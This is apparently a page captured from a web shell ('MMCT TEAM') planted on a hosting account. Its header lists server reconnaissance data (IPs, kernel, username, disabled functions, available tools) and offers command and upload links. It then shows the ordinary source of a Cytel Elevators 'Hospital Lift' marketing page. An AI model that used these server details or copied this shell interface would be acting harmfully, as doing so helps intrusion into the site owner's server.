MMCT TEAM
Server IP : 103.212.121.57  /  Your IP : 216.73.216.123
Web Server : LiteSpeed
System : Linux valor.herosite.pro 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
User : araipddz ( 1784)
PHP Version : 8.2.30
Disable Function : show_source, system, shell_exec, passthru, popen, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/araipddz/cytelelevators.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/araipddz/cytelelevators.in/hospital-lift.php
<!doctype html>
<html class="no-js" lang="en">

<head>
    <!-- title -->
    <meta name="google-site-verification" content="Fxq9I7YKJWXY1zUXCad7SVWiFCCAdqYCDUDXu8cwWdU" />
    <title>Cytel Elevators</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1" />
    

    <link rel="canonical" href="" />

    <script type="text/jscript" src="js/validate2.js"></script>
    <!-- favicon -->
    

    <!-- animation -->
    <link rel="stylesheet" href="css/animate.css" />
    <!-- bootstrap -->
    <link rel="stylesheet" href="css/bootstrap.min.css" />
    <!-- et line icon -->
    <link rel="stylesheet" href="css/et-line-icons.css" />
    <!-- font-awesome icon -->
    <link rel="stylesheet" href="css/font-awesome.min.css" />
    <!-- themify icon -->
    <link rel="stylesheet" href="css/themify-icons.css">
    <!-- swiper carousel -->
    <link rel="stylesheet" href="css/swiper.min.css">
    <!-- justified gallery -->
    <link rel="stylesheet" href="css/justified-gallery.min.css">
    <!-- magnific popup -->
    <link rel="stylesheet" href="css/magnific-popup.css" />
    <!-- revolution slider -->
    <link rel="stylesheet" type="text/css" href="revolution/css/settings.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="revolution/css/layers.css">
    <link rel="stylesheet" type="text/css" href="revolution/css/navigation.css">
    <!-- bootsnav -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="css/bootsnav.css">
    <!-- style -->
    <link rel="stylesheet" href="css/style.css" />
    <!-- responsive css -->
    <link rel="stylesheet" href="css/responsive.css" />
    <!--[if IE]>
            <script src="js/html5shiv.js"></script>
        <![endif]-->

    

    <style>
        .dropdown-menu {
            min-width: 0;
        }
        /* Hide the content on small devices */

/* Hide the content on small devices */
@media (max-width: 767px) {
    .jy {
        display: none;
    }
}

    </style>
    

</head>

<body>
  
  
<?php
include('header.php');
?>

<style>
   
.shado-banner{
	-webkit-box-shadow:0 2px 2px -1px rgba(0,0,0,.35),0 1px 5px -2px rgba(0,0,0,.35),0 1px 8px -1px rgba(0,0,0,.25);
	box-shadow:0 2px 2px -1px rgba(0,0,0,.35),0 1px 5px -2px rgba(0,0,0,.35),0 1px 8px -1px rgba(0,0,0,.25);
}
*{
	-webkit-box-sizing:border-box;
	box-sizing:border-box;
}
.spacer{
	-ms-flex-positive:1;
	-webkit-box-flex:1;
	flex-grow:1;
	width:100%;
	height:80px;
}
/****
	*	FIRST BOX
	**/
#left-flex .ribbon *{
	position:relative;
}
#left-flex .ribbon:before{
	background-color:rgba(20,30,50,.9);
	content:'';
	display:block;
	height:525px;
	left:0;
	position:absolute;
	width:100%;
	z-index:0;
}
#left-flex .ribbon{
	-webkit-box-align:center;
	-ms-flex-align:center;
	align-items:center;
	background-size:cover;
	background:url('./images/Hospital Elevators.jpg') center center / cover no-repeat fixed;
	display:-webkit-box;
	display:-ms-flexbox;
	display:flex;
	height:525px;
	-webkit-box-pack:center;
	-ms-flex-pack:center;
	justify-content:center;
	margin:0;
	width:100%;
	z-index:-1;
}
#left-flex .title-wrapper{
	display:-webkit-box;
	display:-ms-flexbox;
	display:flex;
	-webkit-box-orient:vertical;
	-webkit-box-direction:normal;
	-ms-flex-flow:column wrap;
	flex-flow:column wrap;
	-webkit-box-pack:center;
	-ms-flex-pack:center;
	justify-content:center;
	margin:0;
	max-width:1040px;
	min-width:200px;
	padding:0;
	text-align:left;
	width:88%;
}
#left-flex .title-wrapper > *{
	color:#f2f2f2;
	font-weight:400;
	margin:0;
	padding:0;
	text-align:left;
}
#left-flex h1{
	font-size:3.5rem;
	line-height:1.1;
}
#left-flex p{
	font-size:1.75rem;
}
@media only screen and (max-width:629px){
	#left-flex .title-wrapper{
		-webkit-appearance:none;
		-moz-appearance:none;
		appearance:none;
	}
	#left-flex #title-wrapper h1{
		font-size:2.75rem;
	}
	#left-flex p{
		font-size:1.4rem;
	}
}

</style>



<main>
	<div>
		<!-- Left Aligned -->
		<section id="left-flex">
			<div class="shado-banner ribbon">
				<div class=" title-wrapper">
					<h1 class="no-margin no-border">Hospital Lift</h1>
					<p>Welcome To Cytel Elevators</p>
				</div>
			</div>
		</section><!-- /end Left Aligned -->
		
	</div>
</main>



<section class="wow fadeIn __web-inspector-hide-shortcut__" style="visibility: visible; animation-name: fadeIn;">
            <div class="container">
                <div class="row">
                    <div class="col-12 col-lg-8 text-center text-lg-left md-margin-30px-bottom md-padding-80px-lr sm-padding-15px-lr wow fadeIn" style="visibility: visible; animation-name: fadeIn;">
                        <h5 class="alt-font font-weight-600 text-extra-dark-gray text-uppercase lg-width-100">Hospital Lift</h5>
                        <div class="separator-line-verticle-extra-small bg-extra-dark-gray width-100 md-width-80 mx-auto ml-lg-0 margin-30px-bottom md-margin-20px-bottom"></div>
                        <p class="width-95 lg-width-100 text-justify">In the fast-paced environment of hospitals, where every second counts and efficiency is paramount, Cytel Elevators emerges as the beacon of reliability and innovation in vertical transportation. Hospitals demand elevators that go beyond mere functionality; they require systems that seamlessly integrate into the intricate web of healthcare operations, ensuring swift patient transportation, staff mobility, and emergency responsiveness.


</p>
<ul>
  <li class="text-justify"><strong>Unparalleled Reliability:</strong> At the heart of Cytel Elevators' ethos lies a commitment to reliability. In hospitals, where elevator downtime is not an option, Cytel's cutting-edge technology guarantees uninterrupted service. With advanced predictive maintenance algorithms, potential issues are identified and rectified proactively, minimizing disruptions to hospital operations and ensuring continuous mobility flow.</li>
  <li class="text-justify"><strong>Customized Solutions:</strong> Recognizing the unique challenges posed by hospital environments, Cytel Elevators offers bespoke solutions tailored to meet specific needs. Whether it's accommodating specialized medical equipment, optimizing traffic flow in busy corridors, or prioritizing elevator allocation during emergencies, Cytel Elevators delivers tailored systems that enhance overall efficiency and patient care.</li>
  <li class="text-justify"><strong>Patient-Centric Design:</strong> Patient comfort and safety are paramount in hospital lift solutions. Cytel Elevators prioritizes user experience, incorporating features such as spacious cabins, smooth acceleration, and ergonomic handrails to ensure a comfortable journey for patients, visitors, and staff alike. With intuitive interfaces and clear signage, Cytel Elevators ensures that navigating the hospital is effortless for everyone.</li>
  <li class="text-justify"><strong>Efficiency Redefined:</strong> In an environment where time is of the essence, Cytel Elevators' focus on efficiency sets it apart. Through advanced traffic management systems, destination dispatch technology, and intelligent scheduling algorithms, Cytel Elevators optimizes transportation pathways, reducing wait times and maximizing throughput, thus streamlining hospital operations and improving overall productivity.</li>
  <li class="text-justify"><strong>Safety First:</strong> In a healthcare setting, safety is non-negotiable. Cytel Elevators adheres to the highest safety standards, incorporating features such as emergency communication systems, redundant fail-safe mechanisms, and anti-bacterial surfaces to mitigate risks and ensure a secure transportation environment for all users.</li>
  <li class="text-justify"><strong>Sustainability:</strong> Cytel Elevators is committed to sustainability, offering energy-efficient solutions that reduce carbon footprint and operating costs. From regenerative drive systems to LED lighting, Cytel Elevators' eco-friendly technologies contribute to a greener, more sustainable healthcare infrastructure.</li>
</ul>

                    </div>
                    <div class="col-12 col-lg-4 col-md-6 wow fadeIn mt-5" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeIn;">
                        <img src="./images/Hospital Elevators.jpg" alt="Service Maintainence" style="height: 400px;" data-no-retina="">
                    </div>
                </div>
            </div>
        </section>




<?php
include('footer.php');
?>

MMCT - 2023